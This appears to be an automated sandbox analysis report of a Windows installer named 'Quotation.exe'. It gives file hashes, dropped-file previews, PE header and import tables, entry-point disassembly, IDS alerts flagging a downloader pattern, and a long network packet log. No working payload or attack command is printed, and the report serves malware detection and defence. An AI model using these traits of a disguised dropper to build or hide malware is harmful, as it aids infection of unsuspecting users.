                                                              Preview:......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):374902
                                                              Entropy (8bit):1.250991222921627
                                                              Encrypted:false
                                                              SSDEEP:1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
                                                              MD5:169115C751DDA5E021E8C86E8454B26D
                                                              SHA1:5A8254634C0C726BB18E42E626EAEB581D532DCD
                                                              SHA-256:ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
                                                              SHA-512:2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
                                                              Malicious:false
                                                              Preview:.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):489048
                                                              Entropy (8bit):1.245615736901525
                                                              Encrypted:false
                                                              SSDEEP:1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
                                                              MD5:B4FB425BAF217F31E91AAB39ABF66DCD
                                                              SHA1:03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
                                                              SHA-256:4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
                                                              SHA-512:E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
                                                              Malicious:false
                                                              Preview:.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^...........*............................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`....*.........................)1.............q..............4....
                                                              Process:C:\Users\user\Desktop\Quotation.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):371
                                                              Entropy (8bit):4.247837387326688
                                                              Encrypted:false
                                                              SSDEEP:6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
                                                              MD5:46003C65AA12A0EBE55662F0141186DC
                                                              SHA1:739652C3375018DAFFB986302A7D3E8D32770B41
                                                              SHA-256:2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
                                                              SHA-512:59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
                                                              Malicious:false
                                                              Preview:degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Entropy (8bit):7.81503713013307
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:Quotation.exe
                                                              File size:1'208'728 bytes
                                                              MD5:9ed064f0feb2397bb999563751c20b92
                                                              SHA1:810d6882ab53614c20950da17021650fed89f5d8
                                                              SHA256:f849a928785cb16a719369fbe98c9246bc84d634f3547467a3223fa148a6b09b
                                                              SHA512:ef7d103dad237045980181b85ddc6b0d4ffbbcbdf38eb2a56b09823baae143f52c336f89ec45bd872f7dca255156b9f44208e979e37f0995a18fc7f2de359ffd
                                                              SSDEEP:24576:S4nhDoAFq5Avnh/KPGB8mTyBNFX3FZNXLGQ7WczkxFnfbP9:S+hkT6vnh/J8oy5X3PNXKQKczg
                                                              TLSH:B845222932B6D08BD6824A3C4BF3E735DE7DEE143D26942777712F4E9D30288AE46650
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.
                                                              Icon Hash:873335651170390f
                                                              Entrypoint:0x4036da
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:3f91aceea750f765ef2ba5d9988e6a00
                                                              Signature Valid:false
                                                              Signature Issuer:CN=Teaberries, O=Teaberries, L=Le Pas, C=FR
                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                              Error Number:-2146762487
                                                              Not Before, Not After
                                                              • 12/03/2024 02:52:12 12/03/2027 02:52:12
                                                              Subject Chain
                                                              • CN=Teaberries, O=Teaberries, L=Le Pas, C=FR
                                                              Version:3
                                                              Thumbprint MD5:20BF21B5BB8BD4ADC8241FBC132F153B
                                                              Thumbprint SHA-1:7B90FE6EFB81F5301AE4609BDA23D016FBE84269
                                                              Thumbprint SHA-256:FC9FF8A2D1437A37705EDB7D9B016A35F2B22465B8BECAD31D75739BDE5A03A2
                                                              Serial:7565486B99A8B4326594078BB65FCED341D7D33E
                                                              Instruction
                                                              sub esp, 000003ECh
                                                              push ebx
                                                              push ebp
                                                              push esi
                                                              push edi
                                                              xor ebx, ebx
                                                              mov edi, 00408528h
                                                              push 00008001h
                                                              mov dword ptr [esp+14h], ebx
                                                              mov ebp, ebx
                                                              call dword ptr [00408170h]
                                                              mov esi, dword ptr [004080ACh]
                                                              lea eax, dword ptr [esp+2Ch]
                                                              xorps xmm0, xmm0
                                                              mov dword ptr [esp+40h], ebx
                                                              push eax
                                                              movlpd qword ptr [esp+00000144h], xmm0
                                                              mov dword ptr [esp+30h], 0000011Ch
                                                              call esi
                                                              test eax, eax
                                                              jne 00007FEF74529189h
                                                              lea eax, dword ptr [esp+2Ch]
                                                              mov dword ptr [esp+2Ch], 00000114h
                                                              push eax
                                                              call esi
                                                              push 00000053h
                                                              pop eax
                                                              mov dl, 04h
                                                              mov byte ptr [esp+00000146h], dl
                                                              cmp word ptr [esp+40h], ax
                                                              jne 00007FEF74529163h
                                                              mov eax, dword ptr [esp+5Ah]
                                                              add eax, FFFFFFD0h
                                                              mov word ptr [esp+00000140h], ax
                                                              jmp 00007FEF7452915Dh
                                                              xor eax, eax
                                                              jmp 00007FEF74529144h
                                                              mov dl, byte ptr [esp+00000146h]
                                                              cmp dword ptr [esp+30h], 0Ah
                                                              jnc 00007FEF7452915Dh
                                                              movzx eax, word ptr [esp+38h]
                                                              mov dword ptr [esp+38h], eax
                                                              jmp 00007FEF74529156h
                                                              mov eax, dword ptr [esp+38h]
                                                              mov dword ptr [007A8638h], eax
                                                              movzx eax, byte ptr [esp+30h]
                                                              shl ax, 0008h
                                                              movzx ecx, ax
                                                              movzx eax, byte ptr [esp+34h]
                                                              or ecx, eax
                                                              movzx eax, byte ptr [esp+00000140h]
                                                              shl ax, 0008h
                                                              shl ecx, 10h
                                                              movzx eax, word ptr [eax]
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8a000xa0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3db0000x3e910.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x125fa00x11f8.data
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x6c0b0x6e009178309eee1a86dc5ef945d6826a6897False0.6605823863636363data6.398414552532143IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x80000x18960x1a000885e83a553c38819d1fab2908ca0cf5False0.4307391826923077data4.86610208699674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xa0000x39e6400x2005c0f03a1a77f205400c2cbabec9976c4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .ndata0x3a90000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x3db0000x3e9100x3ea002690c3c0c1de505f961321c7e2d6da34False0.6915076097804391data6.574790239627466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0x3db3880x16482PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000394451383867
                                                              RT_ICON0x3f18100x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.486498876138649
                                                              RT_ICON0x4020380x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5308492747529956
                                                              RT_ICON0x40b4e00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5497227356746766
                                                              RT_ICON0x4109680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5415682569674067
                                                              RT_ICON0x414b900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5884854771784233
                                                              RT_ICON0x4171380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6179643527204502
                                                              RT_ICON0x4181e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6668032786885246
                                                              RT_ICON0x418b680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7287234042553191
                                                              RT_DIALOG0x418fd00x100dataEnglishUnited States0.5234375
                                                              RT_DIALOG0x4190d00x11cdataEnglishUnited States0.6056338028169014
                                                              RT_DIALOG0x4191f00xc4dataEnglishUnited States0.5918367346938775
                                                              RT_DIALOG0x4192b80x60dataEnglishUnited States0.7291666666666666
                                                              RT_GROUP_ICON0x4193180x84Targa image data - Map 32 x 25730 x 1 +1EnglishUnited States0.7348484848484849
                                                              RT_VERSION0x4193a00x220dataEnglishUnited States0.5110294117647058
                                                              RT_MANIFEST0x4195c00x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5529131985731273
                                                              DLLImport
                                                              ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                                              SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                                              ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                                              COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                              USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                                              GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                                              KERNEL32.dllWriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-11-04T10:00:13.349949+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.549704TCP
                                                              2024-11-04T10:00:28.263870+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549767142.250.186.174443TCP
                                                              2024-11-04T10:00:52.036491+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.549888TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 4, 2024 10:00:26.783416033 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:26.783427000 CET44349767142.250.186.174192.168.2.5
                                                              Nov 4, 2024 10:00:26.783535004 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:26.791717052 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:26.791731119 CET44349767142.250.186.174192.168.2.5
                                                              Nov 4, 2024 10:00:27.644102097 CET44349767142.250.186.174192.168.2.5
                                                              Nov 4, 2024 10:00:27.644169092 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:27.644826889 CET44349767142.250.186.174192.168.2.5
                                                              Nov 4, 2024 10:00:27.644885063 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:27.901628017 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:27.901639938 CET44349767142.250.186.174192.168.2.5
                                                              Nov 4, 2024 10:00:27.902004957 CET44349767142.250.186.174192.168.2.5
                                                              Nov 4, 2024 10:00:27.902070045 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:27.905908108 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:27.951338053 CET44349767142.250.186.174192.168.2.5
                                                              Nov 4, 2024 10:00:28.263916969 CET44349767142.250.186.174192.168.2.5
                                                              Nov 4, 2024 10:00:28.264049053 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:28.264483929 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:28.264522076 CET44349767142.250.186.174192.168.2.5
                                                              Nov 4, 2024 10:00:28.264662027 CET49767443192.168.2.5142.250.186.174
                                                              Nov 4, 2024 10:00:28.290769100 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:28.290791988 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:28.290879965 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:28.291122913 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:28.291131020 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:29.147655964 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:29.147799015 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:29.152369976 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:29.152375937 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:29.152600050 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:29.152687073 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:29.166377068 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:29.211338043 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.316909075 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.316999912 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.325100899 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.325182915 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.434129000 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.434202909 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.434772015 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.434833050 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.434838057 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.434884071 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.435051918 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.435117006 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.436789036 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.436851978 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.436974049 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.437041044 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.442759037 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.442809105 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.442954063 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.443005085 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.451783895 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.451843023 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.451848030 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.451889038 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.563169956 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.563235998 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.563242912 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.563298941 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.563530922 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.563580990 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.563585043 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.563633919 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.563637018 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.563684940 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.563688993 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.563740015 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.564214945 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.564294100 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.564296961 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.564368963 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.570346117 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.570413113 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.570476055 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.570543051 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.670527935 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.670578003 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.670677900 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.670684099 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.670752048 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.670752048 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.670958042 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.671148062 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.673619986 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.673701048 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.673759937 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.673823118 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.673964024 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.674015045 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.680826902 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.680902958 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.680978060 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.681027889 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.687269926 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.687319040 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.687414885 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.687464952 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.787656069 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.787779093 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.788089037 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.788232088 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.788278103 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.788331985 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.788381100 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.788427114 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.792046070 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.792090893 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.792094946 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.792139053 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.792359114 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.792407036 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.792409897 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.792493105 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.792495966 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.792541981 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.798667908 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.798808098 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.798811913 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.798923969 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.805337906 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.805447102 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.805452108 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.805541039 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.805603027 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.805643082 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.906099081 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.906184912 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.906189919 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.906246901 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.909449100 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.909506083 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.909612894 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.909663916 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.909759045 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.909800053 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.909959078 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.910005093 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.916476011 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.916533947 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.916614056 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.916654110 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.923021078 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.923063993 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.923157930 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.923198938 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.923398018 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.923434019 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:31.923438072 CET44349773142.250.185.97192.168.2.5
                                                              Nov 4, 2024 10:00:31.923476934 CET49773443192.168.2.5142.250.185.97
                                                              Nov 4, 2024 10:00:32.023896933 CET44349773142.250.185.97192.168.2.5
